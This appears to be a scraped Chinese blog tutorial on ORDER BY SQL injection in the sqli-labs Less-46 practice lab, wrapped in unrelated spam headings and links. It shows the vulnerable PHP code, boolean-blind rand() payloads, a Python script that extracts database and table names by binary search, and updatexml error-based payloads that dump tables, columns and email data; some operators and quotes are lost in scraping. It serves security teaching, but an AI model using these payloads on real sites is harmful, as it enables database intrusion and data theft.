当前位置: 首页 > news >正文

网站的成本衡阳城乡建设部网站首页

news 2025/11/21 10:49:10
网站的成本,衡阳城乡建设部网站首页,vs 网站项目,室内设计联盟官方网站入口什么是order by 在MySQL支持使用ORDER BY语句对查询结果集进行排序处理#xff0c;使用ORDER BY语句不仅支持对单列数据的排序#xff0c;还支持对数据表中多列数据的排序。语法格式如下 select * from 表名 order by 列名(或者数字) asc#xff1b;升序(默认升序) selec…什么是order by 在MySQL支持使用ORDER BY语句对查询结果集进行排序处理使用ORDER BY语句不仅支持对单列数据的排序还支持对数据表中多列数据的排序。语法格式如下 select * from 表名 order by 列名(或者数字) asc升序(默认升序)  select * from 表名 order by 列名(或者数字) desc降序 使用sqli-labs-php7-master环境 在第46关查看源码及打开网页 源代码 !DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd html xmlnshttp://www.w3.org/1999/xhtml head meta http-equivContent-Type contenttext/html; charsetutf-8 / titleORDER BY-Error-Numeric/title /headbody bgcolor#000000 div style margin-top:70px;color:#FFF; font-size:23px; text-align:centerWelcomenbsp;nbsp;nbsp;font color#FF0000 Dhakkan /fontbr font size3 color#FFFF00?php include(../sql-connections/sqli-connect.php); $id$_GET[sort]; if(isset($id)){//logging the connection parameters to a file for analysis.$fpfopen(result.txt,a);fwrite($fp,SORT:.$id.\n);fclose($fp);$sql SELECT * FROM users ORDER BY $id;$result mysqli_query($con1, $sql);if ($result){?centerfont color #00FF00 size4table border1trthnbsp;IDnbsp;/ththnbsp;USERNAMEnbsp; /ththnbsp;PASSWORDnbsp; /th/tr/font/font?phpwhile ($row mysqli_fetch_assoc($result)){echo font color #00FF11 size3; echo tr;echo td.$row[id]./td;echo td.$row[username]./td;echo td.$row[password]./td;echo /tr;echo /font;} echo /table;}else{echo font color #FFFF00;print_r(mysqli_error($con1));echo /font; }} else{echo Please input parameter as SORT with numeric valuebrbrbrbr;echo brbrbr;echo img src../images/Less-46.jpg /br;echo Lesson Concept and code Idea by bD4rk/b;} ?/font /div/br/br/br/center /body /html通过审计代码得知是通过stor进行数据的接收 然后将接收到的数据拼接为一个payload 其中代码中没有做任何的过滤和闭合 在前端网页中尝试发送数据查看具体的效果 通过上传数据可以看到是根据输入的字段进行排序的 我们知道order by可以根据字段或者数值 并且我们可以看到前端页面根据排序的数值不同会出现不同的变化 可见我们确实能通过布尔盲注来进行注入 我们需要使用到这些函数 首先可以使用select database()找到库名 接着我们可以使用substr()将库名的字符一个一个的截取出来 我们可以通过ascii()函数将数据库名的每个字母转为ascii码 接着使用rand()函数进行布尔判断 rand()函数可以产生一个随机值但是如果我们给rand()函数中添加一个值那么rand()产生的值将是固定的例如 所以我们可以利用rand()函数的这个特性进行布尔盲注 具体怎么做呢 我们根据上面的方法具体可以将payload写为这样 ?sortrand(ascii(substr((select database()),1,1))114) 具体意思是找到库名将库名的第一个字母截取出来然后转为ascii码然后进行真假判断根据真假生成随机数 我们之前看到真或假前端页面会出现变化所以我们就可以通过不断的尝试来验证我们的猜想 我们可以看到当它真的小于115的时候页面没有任何变化当他大于115为假的时候它的页面出现了变化所以我们现在就可以确定库名的第一个字母ascii的值为115通过对比ascii表我们就可以得出第一个字母为s以此类推我们可以得出库名表名等等 但是这也太麻烦了 纯手工显得我们比较呆我们可以使用python写一个脚本让脚本帮我们跑   import requests import time #这里需要下载一下beautifulsoup的库 #可以在pycharm中的terminal终端界面中输入pip install beautifulsoup4 from bs4 import BeautifulSoup 查表名 查列名 查具体字段内容 if(ascii(substr(database(),1,1))100,%20sleep(3),%200)-- if(ascii(substr(database(),1,1))110, sleep(3), 0) def inject_database(url):使用二分法查询 aaaaaaaaaaaaaaaaaaaaname for i in range(1, 50):#这里是猜的因为我们不知道库名的长度如果报表名可以更长随便写low 32 #asc从32开始到128结束high 128mid (low high) // 2 while low high:# 爆库名payload rand(ascii(substr((select database()),%d,1))%d) % (i, mid)# 爆表名#payload rand(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema database()), %d, 1))%d) % (i, mid)# 将payload作为参数传递给请求params {sort: payload}# start_time time.time()# 发送一个GET请求到指定的URL带上构造好的参数r requests.get(url, paramsparams)# 获取请求得到的HTML响应内容html r.text# 使用BeautifulSoup解析HTML内容soup BeautifulSoup(html, html.parser)# 从HTML中找到第二个td标签并获取其文本内容这似乎是用来获取用户名getusername soup.find_all(td)[1].text# end_time time.time()# 检查获取的用户名是否为admin3如果是则更新low的值if getusername admin3:low mid 1# 如果获取的用户名不是admin3则更新high的值else:high mid# 更新中间值继续二分查找mid (low high) // 2if mid 32:break# 将找到的字符添加到name中name chr(mid)# 打印出当前已经找到的数据库名称print(name)if __name__ __main__:url http://127.0.0.1/sqli-labs-php7-master/less-46/inject_database(url) 这样就方便多了比如说爆库名 爆表名 如果你仔细看过代码你会发现其实可以使用报错注入 ?sortupdatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),0x5e),1) ?sortupdatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameemails),0x5e),1) 爆数据   ?sortupdatexml(1,concat(0x5e,(select substr(email_id,1,32) from emails limit 1 offset 0),0x5e),1) limit用来限制显示的行数        offset用来限制显示第几行默认从0开始
http://www.zqtcl.cn/news/581092/

相关文章:

  • 演示 又一个wordpress站点静态页面加wordpress
  • 企业做淘宝客网站有哪些有网站吗给一个
  • 深圳网站制作公司信息之梦与wordpress哪个好用
  • 免费搭建商城网站山西制作网站公司排名
  • 网站开发免费中建建设银行网站
  • 301重定向到新网站在线建站
  • 曰本做爰l网站沙朗做网站公司
  • 广州网站设计智能 乐云践新专家wordpress 头像设置
  • 电子商务学网站建设好吗佛山市手机网站建设企业
  • 为企业做网站电话开场白小说网站的里面的搜索是怎么做的
  • 深圳市设计网站公司自己做网站开网店
  • 智能建站cms管理系统修改wordpress时区
  • 站长怎么添加网站内容重庆网站推
  • 东莞网站建设属于什么专业网页设计代码书
  • 网站后台代码在哪修改wordpress添加搜索小工具
  • 爱站站长工具中国建设监理协会官方网站
  • 珠海微信网站开发东莞网站制作方案定制
  • 大学网站建设说明书记的网站域名
  • 网站如何开通支付功能第一ppt课件免费下载官网
  • 做1元夺宝网站挣钱吗美工网站设计收费
  • 华侨城网站开发wordpress页码颜色
  • 上海建站网络公司制作文字图片
  • 平台型网站制作网站建设张世勇
  • 网站建设云南网页游戏大厅都有哪些
  • 网站建设与管理报告书郑州建设银行网站
  • 做网站网页的人是不是思维公司网站建设包括
  • 网站建设都包括哪些网站后台如何上传文件
  • 网站便民服务平台怎么做迁安做网站中的cms开发
  • 做外贸比较好的网站怎么把网站做的好看
  • 有没有在淘宝找人做网站被骗过的台州市环保局网站开发区